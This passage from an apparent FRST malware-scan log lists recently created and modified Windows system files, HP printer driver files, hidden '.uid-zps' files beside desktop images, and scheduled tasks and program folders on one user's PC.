2019-04-10 09:12 - 2019-03-14 10:13 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2019-04-10 09:12 - 2019-03-14 10:13 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2019-04-10 09:12 - 2019-03-14 09:58 - 004708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2019-04-10 09:12 - 2019-03-14 09:58 - 002509824 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2019-04-10 09:12 - 2019-03-14 09:57 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 003392000 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msscntrs.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 003601920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Service.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 002739200 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000528896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2019-04-10 09:12 - 2019-03-14 09:55 - 000458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cldflt.sys
2019-04-10 09:12 - 2019-03-14 09:55 - 000141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmapi.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntlanman.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000062976 _____ (Microsoft Corporation) C:\WINDOWS\system32\EASPolicyManagerBrokerHost.exe
2019-04-10 09:12 - 2019-03-14 09:55 - 000048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\credui.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000395776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000354304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000273408 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2019-04-10 09:12 - 2019-03-14 09:54 - 000118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\negoexts.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcpopkeysrv.dll
2019-04-10 09:12 - 2019-03-14 09:53 - 000787968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2019-04-10 09:12 - 2019-03-14 09:53 - 000473600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2019-04-10 09:12 - 2019-03-14 09:53 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000532992 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuietHours.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShellCommonCommonProxyStub.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2019-04-10 09:12 - 2019-03-14 09:51 - 001216000 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2019-04-10 09:12 - 2019-03-14 09:51 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2019-04-10 09:12 - 2019-03-14 09:51 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\TetheringMgr.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 001410560 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2019-04-10 09:12 - 2019-03-14 09:50 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2019-04-10 09:12 - 2019-03-14 03:57 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2019-04-09 15:01 - 2019-04-09 15:01 - 000000110 ____H C:\Users\TATTOO NR\Desktop\51392159_284362515572546_4538713849758482432_n.jpg.uid-zps
2019-04-09 09:42 - 2019-04-09 09:42 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56513104_450817988996773_8509636489024372736_n.jpg.uid-zps
2019-04-04 09:10 - 2019-04-04 09:10 - 000000110 ____H C:\Users\TATTOO NR\Desktop\stiahnuť.jpgdgvdvs.jpg.uid-zps
2019-04-03 09:37 - 2019-04-03 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56661833_814410745562772_4941172643538665472_n.jpg.uid-zps
2019-04-02 09:59 - 2019-04-02 09:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\oak.jpg.uid-zps
2019-03-29 10:27 - 2019-03-29 10:27 - 000000110 ____H C:\Users\TATTOO NR\Desktop\7b0a60c4ceff6dc73ea538792e018659.jpg.uid-zps
2019-03-25 10:20 - 2019-03-25 10:20 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez názvu.pngdsvsvs.png.uid-zps
2019-03-25 10:16 - 2019-03-25 10:16 - 000000110 ____H C:\Users\TATTOO NR\Desktop\5a837c5dc14a471f7855cf3abb21bfb8.jpg.uid-zps
2019-03-21 10:25 - 2019-03-21 10:25 - 000000110 ____H C:\Users\TATTOO NR\Desktop\52838491_2053531971605785_4529059197068771328_n.jpg.uid-zps
2019-03-20 10:40 - 2019-03-20 10:40 - 000000110 ____H C:\Users\TATTOO NR\Desktop\fc95887d0b1ab9f8d12fc468d1ff861e--rose-jewelry-rose-tattoos.jpg.uid-zps
2019-03-19 10:24 - 2019-03-19 10:24 - 000000110 ____H C:\Users\TATTOO NR\Desktop\69782_2.jpg.uid-zps
2019-03-19 10:21 - 2019-03-19 10:21 - 000000110 ____H C:\Users\TATTOO NR\Desktop\165037545-256-k22498.jpg.uid-zps
2019-03-18 16:06 - 2019-03-18 16:06 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53735603_561863657655130_8592179309412614144_n.jpg.uid-zps
2019-03-18 16:02 - 2019-03-18 16:02 - 000000110 ____H C:\Users\TATTOO NR\Desktop\51223793_480541505809113_1147320454936002560_n.jpg.uid-zps
2019-03-15 02:36 - 2019-03-15 02:36 - 003753088 _____ (Hewlett-Packard Development Company, LP) C:\WINDOWS\system32\HPScanTRDrv_DJ3630.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 002952200 _____ (HP Inc.) C:\WINDOWS\system32\hpinkinsE311.exe
2019-03-15 02:36 - 2019-03-15 02:36 - 000592000 _____ (Hewlett-Packard) C:\WINDOWS\system32\HPWia2_DJ3630.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 000392200 _____ (HP Inc.) C:\WINDOWS\system32\hpinkstsE311LM.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 000327688 _____ (HP Inc.) C:\WINDOWS\system32\hpinkcoiE311.dll
2019-03-13 16:00 - 2019-03-06 17:37 - 001616608 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2019-03-13 16:00 - 2019-03-06 17:14 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2019-03-13 16:00 - 2019-03-06 11:16 - 001188000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2019-03-13 16:00 - 2019-03-06 11:04 - 000628024 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpx.dll
2019-03-13 16:00 - 2019-03-06 10:29 - 002364928 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2019-03-13 16:00 - 2019-03-06 10:29 - 000736256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2019-03-13 16:00 - 2019-03-06 08:14 - 000785568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2019-03-13 16:00 - 2019-03-06 08:14 - 000450872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpx.dll
2019-03-13 16:00 - 2019-03-06 07:50 - 001347584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2019-03-13 16:00 - 2019-02-21 05:26 - 000313344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 002871304 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2019-03-13 16:00 - 2019-02-16 15:02 - 001644040 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000808456 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000735752 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000620040 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000460296 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000322568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000147464 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2019-03-13 16:00 - 2019-02-16 14:57 - 001048472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2019-03-13 16:00 - 2019-02-16 14:56 - 000549520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2019-03-13 16:00 - 2019-02-16 14:53 - 001516416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2019-03-13 16:00 - 2019-02-16 14:34 - 004718080 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2019-03-13 16:00 - 2019-02-16 14:34 - 001725952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2019-03-13 16:00 - 2019-02-16 14:33 - 001786880 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2019-03-13 16:00 - 2019-02-16 14:32 - 002051072 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 001271808 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 001003520 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 000615424 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2019-03-13 16:00 - 2019-02-16 14:30 - 002019840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2019-03-13 16:00 - 2019-02-16 14:22 - 001322176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2019-03-13 16:00 - 2019-02-16 14:07 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2019-03-13 16:00 - 2019-02-16 14:06 - 001530880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2019-03-13 16:00 - 2019-02-16 14:06 - 001451520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2019-03-13 16:00 - 2019-02-16 12:24 - 023862272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2019-03-13 16:00 - 2019-02-16 12:22 - 019525120 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2019-03-13 16:00 - 2019-02-16 10:16 - 000511800 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2019-03-13 16:00 - 2019-02-16 10:15 - 000505656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2019-03-13 16:00 - 2019-02-16 10:03 - 007901392 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2019-03-13 16:00 - 2019-02-16 10:03 - 000510288 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 005821440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 003291632 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 001934800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 001792712 _____ (Microsoft Corporation) C:\WINDOWS\system32\propsys.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 000432952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2019-03-13 16:00 - 2019-02-16 10:01 - 001209696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2019-03-13 16:00 - 2019-02-16 10:01 - 001028920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2019-03-13 16:00 - 2019-02-16 10:01 - 000594024 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2019-03-13 16:00 - 2019-02-16 09:57 - 000383288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2019-03-13 16:00 - 2019-02-16 09:53 - 000443632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2019-03-13 16:00 - 2019-02-16 09:51 - 002479168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2019-03-13 16:00 - 2019-02-16 09:51 - 001584536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\propsys.dll
2019-03-13 16:00 - 2019-02-16 09:50 - 001805648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2019-03-13 16:00 - 2019-02-16 09:50 - 001011872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2019-03-13 16:00 - 2019-02-16 09:37 - 009084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2019-03-13 16:00 - 2019-02-16 09:36 - 007057408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2019-03-13 16:00 - 2019-02-16 09:34 - 005883904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2019-03-13 16:00 - 2019-02-16 09:33 - 006646784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2019-03-13 16:00 - 2019-02-16 09:31 - 002825728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2019-03-13 16:00 - 2019-02-16 09:30 - 001986560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2019-03-13 16:00 - 2019-02-16 09:29 - 001768448 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 003381248 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 002585600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 001668096 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdprt.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll
2019-03-13 16:00 - 2019-02-16 09:27 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2019-03-13 16:00 - 2019-02-16 09:27 - 000686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2019-03-13 16:00 - 2019-02-16 09:26 - 001225216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2019-03-13 16:00 - 2019-02-16 09:26 - 000943616 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2019-03-13 16:00 - 2019-02-16 09:25 - 000884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2019-03-13 16:00 - 2019-02-16 09:25 - 000652800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2019-03-13 15:59 - 2019-03-06 17:36 - 001047352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2019-03-13 15:59 - 2019-03-06 17:17 - 000810496 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2019-03-13 15:59 - 2019-03-06 17:17 - 000116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2019-03-13 15:59 - 2019-03-06 17:12 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2019-03-13 15:59 - 2019-03-06 14:18 - 000918032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2019-03-13 15:59 - 2019-03-06 11:16 - 000722744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimgapi.dll
2019-03-13 15:59 - 2019-03-06 11:16 - 000527160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimserv.exe
2019-03-13 15:59 - 2019-03-06 11:10 - 000248880 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2019-03-13 15:59 - 2019-03-06 11:07 - 000376120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2019-03-13 15:59 - 2019-03-06 11:04 - 000945464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refsv1.sys
2019-03-13 15:59 - 2019-03-06 11:03 - 001921848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refs.sys
2019-03-13 15:59 - 2019-03-06 11:03 - 000375608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msrpc.sys
2019-03-13 15:59 - 2019-03-06 11:02 - 000626488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2019-03-13 15:59 - 2019-03-06 10:33 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2019-03-13 15:59 - 2019-03-06 10:32 - 000358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\exfat.sys
2019-03-13 15:59 - 2019-03-06 10:31 - 000324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2019-03-13 15:59 - 2019-03-06 10:31 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2019-03-13 15:59 - 2019-03-06 10:26 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\npfs.sys
2019-03-13 15:59 - 2019-03-06 10:26 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msfs.sys
2019-03-13 15:59 - 2019-03-06 10:25 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cdfs.sys
2019-03-13 15:59 - 2019-03-06 08:13 - 000607248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wimgapi.dll
2019-03-13 15:59 - 2019-03-06 07:51 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2019-03-13 15:59 - 2019-02-16 15:02 - 000071176 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2019-03-13 15:59 - 2019-02-16 14:57 - 000506088 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2019-03-13 15:59 - 2019-02-16 14:56 - 000540984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2019-03-13 15:59 - 2019-02-16 14:34 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcLayers.dll
2019-03-13 15:59 - 2019-02-16 14:31 - 000861184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2019-03-13 15:59 - 2019-02-16 14:30 - 000877568 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2019-03-13 15:59 - 2019-02-16 14:29 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngOnline.dll
2019-03-13 15:59 - 2019-02-16 14:29 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe
2019-03-13 15:59 - 2019-02-16 14:24 - 000444176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2019-03-13 15:59 - 2019-02-16 14:08 - 000373760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll
2019-03-13 15:59 - 2019-02-16 14:07 - 000484352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2019-03-13 15:59 - 2019-02-16 14:06 - 000774656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2019-03-13 15:59 - 2019-02-16 14:06 - 000765952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2019-03-13 15:59 - 2019-02-16 14:04 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mcbuilder.exe
2019-03-13 15:59 - 2019-02-16 10:15 - 000035640 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2019-03-13 15:59 - 2019-02-16 10:05 - 000087800 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskhostw.exe
2019-03-13 15:59 - 2019-02-16 10:04 - 000193032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2019-03-13 15:59 - 2019-02-16 10:02 - 000705848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2019-03-13 15:59 - 2019-02-16 10:02 - 000413712 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 001285424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2019-03-13 15:59 - 2019-02-16 10:01 - 000641984 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp_win.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 000335672 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 000161664 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTWorkQ.dll
2019-03-13 15:59 - 2019-02-16 09:51 - 000170952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTWorkQ.dll
2019-03-13 15:59 - 2019-02-16 09:50 - 000504072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp_win.dll
2019-03-13 15:59 - 2019-02-16 09:33 - 000054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialMigrationHandler.dll
2019-03-13 15:59 - 2019-02-16 09:33 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredentialMigrationHandler.dll
2019-03-13 15:59 - 2019-02-16 09:32 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2019-03-13 15:59 - 2019-02-16 09:31 - 000392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2019-03-13 15:59 - 2019-02-16 09:31 - 000126976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srpapi.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 002449408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 001124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdprt.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppLockerCSP.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppLockerCSP.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2019-03-13 15:59 - 2019-02-16 09:28 - 000705024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2019-03-13 15:59 - 2019-02-16 09:28 - 000528384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2019-03-13 15:59 - 2019-02-16 09:27 - 000729088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2019-03-13 15:59 - 2019-02-16 09:26 - 000401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2019-03-13 15:46 - 2019-03-13 15:46 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53647244_241340536814671_4800761078776594432_n.jpg.uid-zps

==================== Three months (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-06-11 11:24 - 2018-05-30 09:16 - 000004210 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-06-11 11:21 - 2018-04-11 23:04 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2019-06-11 11:21 - 2018-03-13 17:09 - 000000000 ____D C:\FRST
2019-06-11 11:20 - 2018-05-30 09:16 - 000003510 _____ C:\WINDOWS\System32\Tasks\DashlaneUpgradeCheck
2019-06-11 11:19 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-06-11 11:19 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\GroupPolicy
2019-06-11 11:17 - 2018-05-30 08:56 - 000000000 ____D C:\Users\TATTOO NR
2019-06-11 11:15 - 2018-05-30 09:16 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-06-11 11:14 - 2018-04-11 23:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2019-06-11 11:14 - 2017-12-09 06:22 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2019-06-11 11:14 - 2017-12-09 06:21 - 000065536 _____ C:\WINDOWS\psp_storage.bin
2019-06-11 11:06 - 2018-05-30 08:50 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-06-11 09:07 - 2019-01-05 13:56 - 000002017 _____ C:\Users\TATTOO NR\Desktop\ANYCUBIC Photon Slicer64.lnk
2019-06-10 18:47 - 2018-10-31 23:26 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\D3DSCache
2019-06-10 18:42 - 2018-07-19 14:52 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\uTorrent
2019-06-10 17:10 - 2018-03-13 17:17 - 000000000 ____D C:\AdwCleaner
2019-06-10 15:49 - 2018-02-19 15:26 - 000000000 ____D C:\WINDOWS\system32\Drivers\NGCx64
2019-06-10 15:48 - 2017-12-09 18:07 - 000000000 ____D C:\Program Files\Common Files\AV
2019-06-10 15:26 - 2018-07-19 14:53 - 000000000 ____D C:\stahovanie
2019-06-10 09:38 - 2017-07-27 22:46 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-06-10 09:32 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-06-10 09:32 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-05-22 09:27 - 2017-12-08 22:37 - 000002305 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
